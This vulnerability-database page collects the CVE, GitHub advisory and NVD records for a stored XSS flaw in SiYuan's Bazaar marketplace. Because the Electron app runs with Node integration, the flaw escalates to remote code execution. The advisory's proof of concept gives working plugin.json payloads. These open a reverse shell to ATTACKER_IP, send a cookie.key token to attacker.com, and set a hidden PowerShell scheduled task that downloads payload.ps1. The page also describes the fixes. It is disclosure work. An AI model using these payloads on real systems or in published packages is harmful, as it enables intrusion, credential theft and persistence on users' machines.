CVE-2026-33067 (GCVE-0-2026-33067)

Vulnerability from cvelistv5 – Published: 2026-03-20 08:14 – Updated: 2026-03-20 18:07

Title

SiYuan has Stored XSS to RCE via Unsanitized Bazaar Package Metadata

Summary

SiYuan is a personal knowledge management system. Versions 3.6.0 and below render package metadata fields (displayName, description) using template literals without HTML escaping. A malicious package author can inject arbitrary HTML/JavaScript into these fields, which executes automatically when any user browses the Bazaar page. Because SiYuan's Electron configuration enables nodeIntegration: true with contextIsolation: false, this XSS escalates directly to full Remote Code Execution on the victim's operating system — with zero user interaction beyond opening the marketplace tab. This issue has been fixed in version 3.6.1.

Severity ?

5.3 (Medium)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Assigner

GitHub_M

References

URL

Tags

https://github.com/siyuan-note/siyuan/security/ad…

x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	siyuan-note	siyuan	Affected: < 3.6.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33067",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-20T16:07:37.828477Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-20T18:07:28.928Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-mvpm-v6q4-m2pf"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "siyuan",
          "vendor": "siyuan-note",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.6.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "SiYuan is a personal knowledge management system. Versions 3.6.0 and below render package metadata fields (displayName, description) using template literals without HTML escaping. A malicious package author can inject arbitrary HTML/JavaScript into these fields, which executes automatically when any user browses the Bazaar page. Because SiYuan\u0027s Electron configuration enables nodeIntegration: true with contextIsolation: false, this XSS escalates directly to full Remote Code Execution on the victim\u0027s operating system \u2014 with zero user interaction beyond opening the marketplace tab. This issue has been fixed in version 3.6.1."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "LOW",
            "subIntegrityImpact": "LOW",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-20T08:14:53.500Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-mvpm-v6q4-m2pf",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-mvpm-v6q4-m2pf"
        }
      ],
      "source": {
        "advisory": "GHSA-mvpm-v6q4-m2pf",
        "discovery": "UNKNOWN"
      },
      "title": "SiYuan has Stored XSS to RCE via Unsanitized Bazaar Package Metadata"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33067",
    "datePublished": "2026-03-20T08:14:53.500Z",
    "dateReserved": "2026-03-17T19:27:06.343Z",
    "dateUpdated": "2026-03-20T18:07:28.928Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33067\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-20T09:16:14.863\",\"lastModified\":\"2026-03-23T15:31:25.547\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"SiYuan is a personal knowledge management system. Versions 3.6.0 and below render package metadata fields (displayName, description) using template literals without HTML escaping. A malicious package author can inject arbitrary HTML/JavaScript into these fields, which executes automatically when any user browses the Bazaar page. Because SiYuan\u0027s Electron configuration enables nodeIntegration: true with contextIsolation: false, this XSS escalates directly to full Remote Code Execution on the victim\u0027s operating system \u2014 with zero user interaction beyond opening the marketplace tab. This issue has been fixed in version 3.6.1.\"},{\"lang\":\"es\",\"value\":\"SiYuan es un sistema de gesti\u00f3n de conocimiento personal. Las versiones 3.6.0 e inferiores renderizan los campos de metadatos del paquete (displayName, description) utilizando literales de plantilla sin escape HTML. Un autor de paquete malicioso puede inyectar HTML/JavaScript arbitrario en estos campos, lo que se ejecuta autom\u00e1ticamente cuando cualquier usuario navega por la p\u00e1gina de Bazaar. Debido a que la configuraci\u00f3n de Electron de SiYuan habilita nodeIntegration: true con contextIsolation: false, este XSS escala directamente a la ejecuci\u00f3n remota de c\u00f3digo completa en el sistema operativo de la v\u00edctima \u2014 con cero interacci\u00f3n del usuario m\u00e1s all\u00e1 de abrir la pesta\u00f1a del marketplace. Este problema ha sido solucionado en la versi\u00f3n 3.6.1.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"LOW\",\"subIntegrityImpact\":\"LOW\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H\",\"baseScore\":9.0,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.3,\"impactScore\":6.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.6.1\",\"matchCriteriaId\":\"E1AA6470-222A-4841-A487-DF65F9859780\"}]}]}],\"references\":[{\"url\":\"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-mvpm-v6q4-m2pf\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-mvpm-v6q4-m2pf\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33067\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-20T16:07:37.828477Z\"}}}], \"references\": [{\"url\": \"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-mvpm-v6q4-m2pf\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-20T16:07:56.034Z\"}}], \"cna\": {\"title\": \"SiYuan has Stored XSS to RCE via Unsanitized Bazaar Package Metadata\", \"source\": {\"advisory\": \"GHSA-mvpm-v6q4-m2pf\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 5.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"LOW\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"LOW\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"siyuan-note\", \"product\": \"siyuan\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 3.6.1\"}]}], \"references\": [{\"url\": \"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-mvpm-v6q4-m2pf\", \"name\": \"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-mvpm-v6q4-m2pf\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"SiYuan is a personal knowledge management system. Versions 3.6.0 and below render package metadata fields (displayName, description) using template literals without HTML escaping. A malicious package author can inject arbitrary HTML/JavaScript into these fields, which executes automatically when any user browses the Bazaar page. Because SiYuan\u0027s Electron configuration enables nodeIntegration: true with contextIsolation: false, this XSS escalates directly to full Remote Code Execution on the victim\u0027s operating system \\u2014 with zero user interaction beyond opening the marketplace tab. This issue has been fixed in version 3.6.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-20T08:14:53.500Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33067\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-20T18:07:28.928Z\", \"dateReserved\": \"2026-03-17T19:27:06.343Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-20T08:14:53.500Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-MVPM-V6Q4-M2PF

Vulnerability from github – Published: 2026-03-18 16:09 – Updated: 2026-03-20 21:23

Summary

SiYuan has Stored XSS to RCE via Unsanitized Bazaar Package Metadata

Details

Stored XSS to RCE via Unsanitized Bazaar Package Metadata

Summary

SiYuan's Bazaar (community marketplace) renders package metadata fields (displayName, description) using template literals without HTML escaping. A malicious package author can inject arbitrary HTML/JavaScript into these fields, which executes automatically when any user browses the Bazaar page. Because SiYuan's Electron configuration enables nodeIntegration: true with contextIsolation: false, this XSS escalates directly to full Remote Code Execution on the victim's operating system — with zero user interaction beyond opening the marketplace tab.

Affected Component

Metadata rendering: app/src/config/bazaar.ts:275-277
Electron config: app/electron/main.js:422-426 (nodeIntegration: true, contextIsolation: false)

Affected Versions

SiYuan <= 3.5.9

Severity

Critical — CVSS 9.6 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

CWE-79: Improper Neutralization of Input During Web Page Generation (Stored XSS)

Vulnerable Code

In app/src/config/bazaar.ts:275-277, package metadata is injected directly into HTML templates without escaping:

// Package name injected directly — NO escaping
${item.preferredName}${item.preferredName !== item.name
    ? ` <span class="ft__on-surface ft__smaller">${item.name}</span>` : ""}

// Package description — title attribute uses escapeAttr(), but text content does NOT
<div class="b3-card__desc" title="${escapeAttr(item.preferredDesc) || ""}">
    ${item.preferredDesc || ""}  <!-- UNESCAPED HTML -->
</div>

The inconsistency is notable: the title attribute is escaped via escapeAttr(), but the actual rendered text content is not — indicating the risk was partially recognized but incompletely mitigated.

The Electron renderer at app/electron/main.js:422-426 is configured with:

webPreferences: {
    nodeIntegration: true,
    contextIsolation: false,
    // ...
}

This means any JavaScript executing in the renderer process has direct access to Node.js APIs including require('child_process'), require('fs'), and require('os').

Proof of Concept

Step 1: Create a malicious plugin manifest

Create a GitHub repository with a valid SiYuan plugin structure. In plugin.json:

{
    "name": "helpful-productivity-plugin",
    "displayName": {
        "default": "Helpful Plugin<img src=x onerror=\"require('child_process').exec('calc.exe')\">"
    },
    "description": {
        "default": "Boost your productivity with smart templates"
    },
    "version": "1.0.0",
    "author": "attacker",
    "url": "https://github.com/attacker/helpful-productivity-plugin",
    "minAppVersion": "2.0.0"
}

Step 2: Submit to Bazaar

Submit the repository to the SiYuan Bazaar community marketplace via the standard contribution process (pull request to the bazaar index repository).

Step 3: Zero-click RCE

When any SiYuan desktop user navigates to Settings > Bazaar > Plugins, the package listing renders the malicious displayName. The <img src=x> tag fails to load, firing the onerror handler, which calls require('child_process').exec('calc.exe').

No click is required. The payload executes the moment the Bazaar page loads and the package card is rendered in the DOM.

Escalation: Reverse shell

{
    "displayName": {
        "default": "Helpful Plugin<img src=x onerror=\"require('child_process').exec('bash -c \\\"bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1\\\"')\">"
    }
}

Escalation: Data exfiltration (API token theft)

{
    "displayName": {
        "default": "<img src=x onerror=\"fetch('https://attacker.com/exfil?token='+require('fs').readFileSync(require('path').join(require('os').homedir(),'.config/siyuan/cookie.key'),'utf8'))\">"
    }
}

Escalation: Silent persistence (Windows)

{
    "displayName": {
        "default": "<img src=x onerror=\"require('child_process').exec('schtasks /create /tn SiYuanUpdate /tr \\\"powershell -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString(\\\\\\\"https://attacker.com/payload.ps1\\\\\\\")\\\" /sc onlogon /rl highest /f')\">"
    }
}

Attack Scenario

Attacker creates a legitimate-looking GitHub repository with a SiYuan plugin/theme/template.
Attacker submits it to the SiYuan Bazaar via the standard community contribution process.
The plugin.json manifest contains an XSS payload in the displayName or description field.
When any SiYuan desktop user opens the Bazaar tab, the malicious package card renders the unescaped metadata.
The injected <img onerror> (or <svg onload>, <details ontoggle>, etc.) fires automatically.
JavaScript executes in the Electron renderer with full Node.js access (nodeIntegration: true).
The attacker achieves arbitrary OS command execution — reverse shell, data exfiltration, persistence, ransomware, etc.

The user does not need to install, click, or interact with the malicious package in any way. Browsing the marketplace is sufficient.

Impact

Full remote code execution on any SiYuan desktop user who browses the Bazaar
Zero-click — payload fires on page load, no interaction required
Supply-chain attack — targets the entire SiYuan user community via the official marketplace
Can steal API tokens, session cookies, SSH keys, browser credentials, and arbitrary files
Can install persistent backdoors, scheduled tasks, or ransomware
Affects all platforms: Windows, macOS, Linux

Suggested Fix

1. Escape all package metadata in template rendering (`bazaar.ts`)

function escapeHtml(str: string): string {
    return str.replace(/&/g, '&amp;').replace(/</g, '&lt;')
              .replace(/>/g, '&gt;').replace(/"/g, '&quot;')
              .replace(/'/g, '&#039;');
}

// Apply to ALL user-controlled metadata before rendering
${escapeHtml(item.preferredName)}
<div class="b3-card__desc">${escapeHtml(item.preferredDesc || "")}</div>

2. Server-side sanitization in the Bazaar index pipeline

Sanitize metadata fields at the Bazaar index build stage so malicious content never reaches clients:

func sanitizePackageDisplayStrings(pkg *Package) {
    if pkg == nil {
        return
    }
    for k, v := range pkg.DisplayName {
        pkg.DisplayName[k] = html.EscapeString(v)
    }
    for k, v := range pkg.Description {
        pkg.Description[k] = html.EscapeString(v)
    }
}

3. Long-term: Harden Electron configuration

webPreferences: {
    nodeIntegration: false,
    contextIsolation: true,
    sandbox: true,
}

Severity ?

5.3 (Medium)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siyuan-note/siyuan/kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260317012524-fe4523fff2c8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33067"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-18T16:09:34Z",
    "nvd_published_at": "2026-03-20T09:16:14Z",
    "severity": "MODERATE"
  },
  "details": "# Stored XSS to RCE via Unsanitized Bazaar Package Metadata\n\n## Summary\n\nSiYuan\u0027s Bazaar (community marketplace) renders package metadata fields (`displayName`, `description`) using template literals without HTML escaping. A malicious package author can inject arbitrary HTML/JavaScript into these fields, which executes automatically when any user browses the Bazaar page. Because SiYuan\u0027s Electron configuration enables `nodeIntegration: true` with `contextIsolation: false`, this XSS escalates directly to full Remote Code Execution on the victim\u0027s operating system \u2014 with zero user interaction beyond opening the marketplace tab.\n\n## Affected Component\n\n- **Metadata rendering**: `app/src/config/bazaar.ts:275-277`\n- **Electron config**: `app/electron/main.js:422-426` (`nodeIntegration: true`, `contextIsolation: false`)\n\n## Affected Versions\n\n- SiYuan \u003c= 3.5.9\n\n## Severity\n\n**Critical** \u2014 CVSS 9.6 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)\n\n- CWE-79: Improper Neutralization of Input During Web Page Generation (Stored XSS)\n\n## Vulnerable Code\n\nIn `app/src/config/bazaar.ts:275-277`, package metadata is injected directly into HTML templates without escaping:\n\n```typescript\n// Package name injected directly \u2014 NO escaping\n${item.preferredName}${item.preferredName !== item.name\n    ? ` \u003cspan class=\"ft__on-surface ft__smaller\"\u003e${item.name}\u003c/span\u003e` : \"\"}\n\n// Package description \u2014 title attribute uses escapeAttr(), but text content does NOT\n\u003cdiv class=\"b3-card__desc\" title=\"${escapeAttr(item.preferredDesc) || \"\"}\"\u003e\n    ${item.preferredDesc || \"\"}  \u003c!-- UNESCAPED HTML --\u003e\n\u003c/div\u003e\n```\n\nThe inconsistency is notable: the `title` attribute is escaped via `escapeAttr()`, but the actual rendered text content is not \u2014 indicating the risk was partially recognized but incompletely mitigated.\n\nThe Electron renderer at `app/electron/main.js:422-426` is configured with:\n\n```javascript\nwebPreferences: {\n    nodeIntegration: true,\n    contextIsolation: false,\n    // ...\n}\n```\n\nThis means any JavaScript executing in the renderer process has direct access to Node.js APIs including `require(\u0027child_process\u0027)`, `require(\u0027fs\u0027)`, and `require(\u0027os\u0027)`.\n\n## Proof of Concept\n\n### Step 1: Create a malicious plugin manifest\n\nCreate a GitHub repository with a valid SiYuan plugin structure. In `plugin.json`:\n\n```json\n{\n    \"name\": \"helpful-productivity-plugin\",\n    \"displayName\": {\n        \"default\": \"Helpful Plugin\u003cimg src=x onerror=\\\"require(\u0027child_process\u0027).exec(\u0027calc.exe\u0027)\\\"\u003e\"\n    },\n    \"description\": {\n        \"default\": \"Boost your productivity with smart templates\"\n    },\n    \"version\": \"1.0.0\",\n    \"author\": \"attacker\",\n    \"url\": \"https://github.com/attacker/helpful-productivity-plugin\",\n    \"minAppVersion\": \"2.0.0\"\n}\n```\n\n### Step 2: Submit to Bazaar\n\nSubmit the repository to the SiYuan Bazaar community marketplace via the standard contribution process (pull request to the bazaar index repository).\n\n### Step 3: Zero-click RCE\n\nWhen **any** SiYuan desktop user navigates to **Settings \u003e Bazaar \u003e Plugins**, the package listing renders the malicious `displayName`. The `\u003cimg src=x\u003e` tag fails to load, firing the `onerror` handler, which calls `require(\u0027child_process\u0027).exec(\u0027calc.exe\u0027)`.\n\n**No click is required.** The payload executes the moment the Bazaar page loads and the package card is rendered in the DOM.\n\n### Escalation: Reverse shell\n\n```json\n{\n    \"displayName\": {\n        \"default\": \"Helpful Plugin\u003cimg src=x onerror=\\\"require(\u0027child_process\u0027).exec(\u0027bash -c \\\\\\\"bash -i \u003e\u0026 /dev/tcp/ATTACKER_IP/4444 0\u003e\u00261\\\\\\\"\u0027)\\\"\u003e\"\n    }\n}\n```\n\n### Escalation: Data exfiltration (API token theft)\n\n```json\n{\n    \"displayName\": {\n        \"default\": \"\u003cimg src=x onerror=\\\"fetch(\u0027https://attacker.com/exfil?token=\u0027+require(\u0027fs\u0027).readFileSync(require(\u0027path\u0027).join(require(\u0027os\u0027).homedir(),\u0027.config/siyuan/cookie.key\u0027),\u0027utf8\u0027))\\\"\u003e\"\n    }\n}\n```\n\n### Escalation: Silent persistence (Windows)\n\n```json\n{\n    \"displayName\": {\n        \"default\": \"\u003cimg src=x onerror=\\\"require(\u0027child_process\u0027).exec(\u0027schtasks /create /tn SiYuanUpdate /tr \\\\\\\"powershell -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString(\\\\\\\\\\\\\\\"https://attacker.com/payload.ps1\\\\\\\\\\\\\\\")\\\\\\\" /sc onlogon /rl highest /f\u0027)\\\"\u003e\"\n    }\n}\n```\n\n## Attack Scenario\n\n1. Attacker creates a legitimate-looking GitHub repository with a SiYuan plugin/theme/template.\n2. Attacker submits it to the SiYuan Bazaar via the standard community contribution process.\n3. The `plugin.json` manifest contains an XSS payload in the `displayName` or `description` field.\n4. When **any** SiYuan desktop user opens the Bazaar tab, the malicious package card renders the unescaped metadata.\n5. The injected `\u003cimg onerror\u003e` (or `\u003csvg onload\u003e`, `\u003cdetails ontoggle\u003e`, etc.) fires automatically.\n6. JavaScript executes in the Electron renderer with full Node.js access (`nodeIntegration: true`).\n7. The attacker achieves arbitrary OS command execution \u2014 reverse shell, data exfiltration, persistence, ransomware, etc.\n\n**The user does not need to install, click, or interact with the malicious package in any way.** Browsing the marketplace is sufficient.\n\n## Impact\n\n- **Full remote code execution** on any SiYuan desktop user who browses the Bazaar\n- **Zero-click** \u2014 payload fires on page load, no interaction required\n- **Supply-chain attack** \u2014 targets the entire SiYuan user community via the official marketplace\n- Can steal API tokens, session cookies, SSH keys, browser credentials, and arbitrary files\n- Can install persistent backdoors, scheduled tasks, or ransomware\n- Affects all platforms: Windows, macOS, Linux\n\n## Suggested Fix\n\n### 1. Escape all package metadata in template rendering (`bazaar.ts`)\n\n```typescript\nfunction escapeHtml(str: string): string {\n    return str.replace(/\u0026/g, \u0027\u0026amp;\u0027).replace(/\u003c/g, \u0027\u0026lt;\u0027)\n              .replace(/\u003e/g, \u0027\u0026gt;\u0027).replace(/\"/g, \u0027\u0026quot;\u0027)\n              .replace(/\u0027/g, \u0027\u0026#039;\u0027);\n}\n\n// Apply to ALL user-controlled metadata before rendering\n${escapeHtml(item.preferredName)}\n\u003cdiv class=\"b3-card__desc\"\u003e${escapeHtml(item.preferredDesc || \"\")}\u003c/div\u003e\n```\n\n### 2. Server-side sanitization in the Bazaar index pipeline\n\nSanitize metadata fields at the Bazaar index build stage so malicious content never reaches clients:\n\n```go\nfunc sanitizePackageDisplayStrings(pkg *Package) {\n    if pkg == nil {\n        return\n    }\n    for k, v := range pkg.DisplayName {\n        pkg.DisplayName[k] = html.EscapeString(v)\n    }\n    for k, v := range pkg.Description {\n        pkg.Description[k] = html.EscapeString(v)\n    }\n}\n```\n\n### 3. Long-term: Harden Electron configuration\n\n```javascript\nwebPreferences: {\n    nodeIntegration: false,\n    contextIsolation: true,\n    sandbox: true,\n}\n```",
  "id": "GHSA-mvpm-v6q4-m2pf",
  "modified": "2026-03-20T21:23:43Z",
  "published": "2026-03-18T16:09:34Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-mvpm-v6q4-m2pf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33067"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siyuan-note/siyuan"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "SiYuan has Stored XSS to RCE via Unsanitized Bazaar Package Metadata"
}

FKIE_CVE-2026-33067

Vulnerability from fkie_nvd - Published: 2026-03-20 09:16 - Updated: 2026-03-23 15:31

Severity ?

9.0 (Critical) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/siyuan-note/siyuan/security/advisories/GHSA-mvpm-v6q4-m2pf	Exploit, Mitigation, Vendor Advisory
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/siyuan-note/siyuan/security/advisories/GHSA-mvpm-v6q4-m2pf	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	b3log	siyuan	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "E1AA6470-222A-4841-A487-DF65F9859780",
              "versionEndExcluding": "3.6.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "SiYuan is a personal knowledge management system. Versions 3.6.0 and below render package metadata fields (displayName, description) using template literals without HTML escaping. A malicious package author can inject arbitrary HTML/JavaScript into these fields, which executes automatically when any user browses the Bazaar page. Because SiYuan\u0027s Electron configuration enables nodeIntegration: true with contextIsolation: false, this XSS escalates directly to full Remote Code Execution on the victim\u0027s operating system \u2014 with zero user interaction beyond opening the marketplace tab. This issue has been fixed in version 3.6.1."
    },
    {
      "lang": "es",
      "value": "SiYuan es un sistema de gesti\u00f3n de conocimiento personal. Las versiones 3.6.0 e inferiores renderizan los campos de metadatos del paquete (displayName, description) utilizando literales de plantilla sin escape HTML. Un autor de paquete malicioso puede inyectar HTML/JavaScript arbitrario en estos campos, lo que se ejecuta autom\u00e1ticamente cuando cualquier usuario navega por la p\u00e1gina de Bazaar. Debido a que la configuraci\u00f3n de Electron de SiYuan habilita nodeIntegration: true con contextIsolation: false, este XSS escala directamente a la ejecuci\u00f3n remota de c\u00f3digo completa en el sistema operativo de la v\u00edctima \u2014 con cero interacci\u00f3n del usuario m\u00e1s all\u00e1 de abrir la pesta\u00f1a del marketplace. Este problema ha sido solucionado en la versi\u00f3n 3.6.1."
    }
  ],
  "id": "CVE-2026-33067",
  "lastModified": "2026-03-23T15:31:25.547",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.0,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
